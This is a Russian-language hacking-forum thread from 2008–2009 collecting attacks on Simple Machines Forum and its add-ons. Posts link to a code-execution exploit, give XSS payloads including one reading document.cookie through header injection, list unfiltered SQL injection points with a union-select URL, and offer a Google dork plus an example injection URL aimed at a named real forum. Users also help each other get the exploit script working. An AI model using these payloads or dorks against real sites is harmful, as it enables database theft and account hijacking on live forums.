HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.11.2008, 20:46
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

Simple Machines Forum <= 1.1.6 Code Execution (LFI)
Автор:~elmysterio ( a.k.a us )

Локальный инклуд раннее загруженного атачмента с расширением .gif, содержащим шелл

http://milw0rm.com/exploits/7011
 
Ответить с цитированием

  #2  
Старый 05.11.2009, 21:21
dolmatian
Новичок
Регистрация: 04.11.2009
Сообщений: 2
Провел на форуме:
32003

Репутация: 4
По умолчанию

Цитата:
Сообщение от [Raz0r]  
Simple Machines Forum <= 1.1.6 Code Execution (LFI)
Автор:~elmysterio ( a.k.a us )

Локальный инклуд раннее загруженного атачмента с расширением .gif, содержащим шелл

http://milw0rm.com/exploits/7011
можно обойти ограничение на magic_quotes_gpc OFF
если для изменения параметра theme_dir использовать POST запрос к Profile.php
 
Ответить с цитированием

  #3  
Старый 08.11.2008, 18:58
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

SMF <= 1.1.6 Karma Description Mod XSS
Код:
<script>alert(/XSS/)</script>
Автор: mailbrush (Я)
Не фильтрируется поле "За что" в моде кармы.

Последний раз редактировалось mailbrush; 21.11.2008 в 12:02..
 
Ответить с цитированием

  #4  
Старый 11.11.2008, 20:26
yaotzin
Новичок
Регистрация: 06.12.2005
Сообщений: 4
Провел на форуме:
14509

Репутация: 0
По умолчанию

нехтит

Цитата:
# Logged in as yaotzin
# Waiting 5 secs (flood control)
PHP Notice: Use of undefined constant frmdt_filename - assumed 'frmdt_filename'
in D:\PHP\php5.2.6\exploit.php on line 310
PHP Notice: Use of undefined constant frmdt_type - assumed 'frmdt_type' in D:\P
HP\php5.2.6\exploit.php on line 311
PHP Notice: Use of undefined constant frmdt_content - assumed 'frmdt_content' i
n D:\PHP\php5.2.6\exploit.php on line 312
PHP Notice: Use of undefined constant frmdt_url - assumed 'frmdt_url' in D:\PHP
\php5.2.6\exploit.php on line 1263
PHP Notice: Use of undefined constant frmdt_boundary - assumed 'frmdt_boundary'
in D:\PHP\php5.2.6\exploit.php on line 1267
PHP Notice: Use of undefined constant frmdt_filename - assumed 'frmdt_filename'
in D:\PHP\php5.2.6\exploit.php on line 1285
PHP Notice: Use of undefined constant frmdt_type - assumed 'frmdt_type' in D:\P
HP\php5.2.6\exploit.php on line 1287
PHP Notice: Use of undefined constant frmdt_type - assumed 'frmdt_type' in D:\P
HP\php5.2.6\exploit.php on line 1288
PHP Notice: Use of undefined constant frmdt_transfert - assumed 'frmdt_transfer
t' in D:\PHP\php5.2.6\exploit.php on line 1290
PHP Notice: Use of undefined constant frmdt_content - assumed 'frmdt_content' i
n D:\PHP\php5.2.6\exploit.php on line 1293
# Error while posting
# Try augmenting -wait parameter
#

D:\PHP\php5.2.6>
 
Ответить с цитированием

  #5  
Старый 12.11.2008, 05:38
Rashid
Познающий
Регистрация: 31.01.2008
Сообщений: 46
Провел на форуме:
124111

Репутация: 8
По умолчанию

to yaotzin
в рнр.ini
error_reporting = E_ALL & ~E_NOTICE
запускать сплойт с параметром -wait 10
 
Ответить с цитированием

  #6  
Старый 12.11.2008, 05:56
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цель: Simple Machines Forum (SMF) 1.1.6 и более ранние версии
Воздействие: Выполнение произвольных команд
Код эксплоита: http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F362535.php
 
Ответить с цитированием

  #7  
Старый 13.11.2008, 00:31
piton
Новичок
Регистрация: 14.09.2006
Сообщений: 17
Провел на форуме:
96999

Репутация: 0
По умолчанию

Цитата:
Сообщение от Nightmarе  
Цель: Simple Machines Forum (SMF) 1.1.6 и более ранние версии
Воздействие: Выполнение произвольных команд
Код эксплоита: http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F362535.php
Не работает =(
[!!] Wrong username/password
юзер валидный но всеравно не работает (

Последний раз редактировалось piton; 13.11.2008 в 00:35..
 
Ответить с цитированием

  #8  
Старый 04.01.2009, 01:07
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

http://milw0rm.com/exploits/7011


СМФ имеет функцию изменения тем,так вот это уязвимость заключается в изменении настроек тем,а затем присвоения значение $ параметрам конфигурации,так что вы можете изменять настройки смф

Итак:
Sources/Themes.php

249 в index.php:

Код:
'jsoption' => array('Themes.php', 'SetJavaScript')

1185 в Sources/Themes.php

Код:
function SetJavaScript()
Затем эта функция выделяет темы в таблице переменных, которые вы послали

1205 в Sources/Themes.php
Код:
	db_query("
		REPLACE INTO {$db_prefix}themes
			(ID_THEME, ID_MEMBER, variable, value)
		VALUES ($settings[theme_id], $ID_MEMBER, SUBSTRING('$_GET[var]', 1, 255), SUBSTRING('" . (is_array($_GET['val']) ? implode(',', $_GET['val']) : $_GET['val']) . "', 1, 65534))", __FILE__, __LINE__);
Зaтем считывает одну и ту же инфу тем же методом:

Код:
$request = db_query("
			SELECT ID_THEME, variable, value
			FROM {$db_prefix}themes
			WHERE variable IN ('name', 'theme_url', 'theme_dir', 'images_url')" . (empty($modSettings['theme_default']) && !allowedTo('admin_forum') ? "
				AND ID_THEME IN ('$knownThemes')
				AND ID_THEME != 1" : '') . "
				AND ID_THEME != 0
			LIMIT " . count(explode(',', $modSettings['knownThemes'])) * 8, __FILE__, __LINE__);
861 в Sources/Themes.php

Код:
while ($row = mysql_fetch_assoc($request))
Параметры в $context['available_themes'][TEMA]

869 в Sources/Themes.php

Код:
$context['available_themes'][$row['ID_THEME']][$row['variable']] = $row['value'];
Затем принимает информацию по пунктам:

904 в Sources/Themes.php

Код:
foreach ($context['available_themes'] as $ID_THEME => $theme_data)
И в настройки перменные принимают значения,который мы только что изменили

910 в Sources/Themes.php


Код:
$settings = $theme_data;
И в конце концов, в том числе файл, использует значение $ theme_dir
Код:
include($settings['theme_dir'] . '/languages/Settings.' . $user_info['language'] . '.php')
 
Ответить с цитированием

  #9  
Старый 09.01.2009, 21:49
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

Уязвимости в модуле Seo4SMF

SQL Иньекции:

Файл: seo4smf-redirect.php

Куски уязвимого кода:


Line 7-13
Код:
$topic = $_GET['t'];
$board = $_GET['b'];
$other = $_GET['o'];
$user = $_GET['u'];
$tpage = $_GET['p'];
$action = $_GET['a'];
$param = $_GET['param'];
Line 50-63
Код:
$query = db_query("
SELECT m.ID_TOPIC, m.subject ,b.ID_BOARD, b.name
FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b
WHERE m.ID_TOPIC = $topic
AND m.ID_BOARD = b.ID_BOARD
IMIT 1", __FILE__, __LINE__);
Line 105-108
Код:
$query = db_query("
SELECT name FROM {$db_prefix}boards AS b
WHERE ID_BOARD = $board
LIMIT 1", __FILE__, __LINE__);
Line 125
Код:
$request = db_query("SELECT memberName FROM {$db_prefix}members where
ID_MEMBER=".$user." limit 1", __FILE__, __LINE__);
Line 143
Код:
$request = db_query("SELECT subject FROM {$db_prefix}tp_articles where
id=".$tpage." limit 1", __FILE__, __LINE__);
Переменные не содержат никакие фильтры,поэтому можно провести Sql иньекцию.

Код:
http://site/smf/seo4smf-redirect.php?t=-1 union select 1,2,3...,concat(username(),database()) –

XSS:



Файл: seo4smf-redirect.php

Кусок уязвимого кода:
Код:
if(!empty($url)){
 header('HTTP/1.1 301 Moved Permanently');
 header('Location: '.$url);
 exit;
}
Код:
http://site/seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie);

Последний раз редактировалось baltazar; 28.01.2009 в 17:58..
 
Ответить с цитированием

Member Awards 1.02 Blind SQL-Injection
  #10  
Старый 13.06.2009, 17:53
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию Member Awards 1.02 Blind SQL-Injection

Blind SQL-Инъекция в моде Member Awards
Автор: mailbrush
Часть уязвимого кода (ManageAwards.php):
PHP код:
        // Load single award ifo for editing.
        
$request db_query("
            SELECT ID_AWARD, awardName, gameName, timeAdded, filename, width, height
            FROM 
{$db_prefix}awards
            WHERE ID_AWARD = 
$_REQUEST[id]
            LIMIT 1"
__FILE____LINE__); 
Уязвимость позволяет удаленному пользователю выполнить произвольные запросы в базу. Уязвимость существует в передаваемом параметре id.

Дорк:
Код:
inurl:index.php?action=profile;sa=awardsMembers;id=1
На многих найденных форумах, вместо награды будет сообщение
Цитата:
The user whose profile you are trying to view does not exist.
Оно возникает потому что удалённый пользователь не выбрал пользователя для просмотра, что есть обязаным для SMF. Решается это простоым добавлением id любого пользователя -
Код:
http://evilsite.com/smf/index.php?action=profile;sa=awardsMembers;u=1;id=1
Пример:
Код:
http://forum.rockmanpm.com/index.php?action=profile;sa=awardsMembers;u=1;id=1+and+substring(version(),1)=5
Способ обхода фильтра и эксплуатации уязвимости:

https://forum.antichat.ru/showpost.p...postcount=7592
https://forum.antichat.ru/threadnav46016-759-10.html

Последний раз редактировалось Grey; 14.06.2009 в 18:28..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Сценарии/CMF/СMS 167 17.10.2019 18:14
[Обзор уязвимостей в форумных движках] Grey Сценарии/CMF/СMS 49 02.04.2015 17:48
Уязвимость в Simple machines smf 1.0 beta 5 public Nemirof Сценарии/CMF/СMS 0 23.10.2004 00:47
Вопрос про уязвимости в Simple machines forum Сценарии/CMF/СMS 4 27.08.2004 14:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ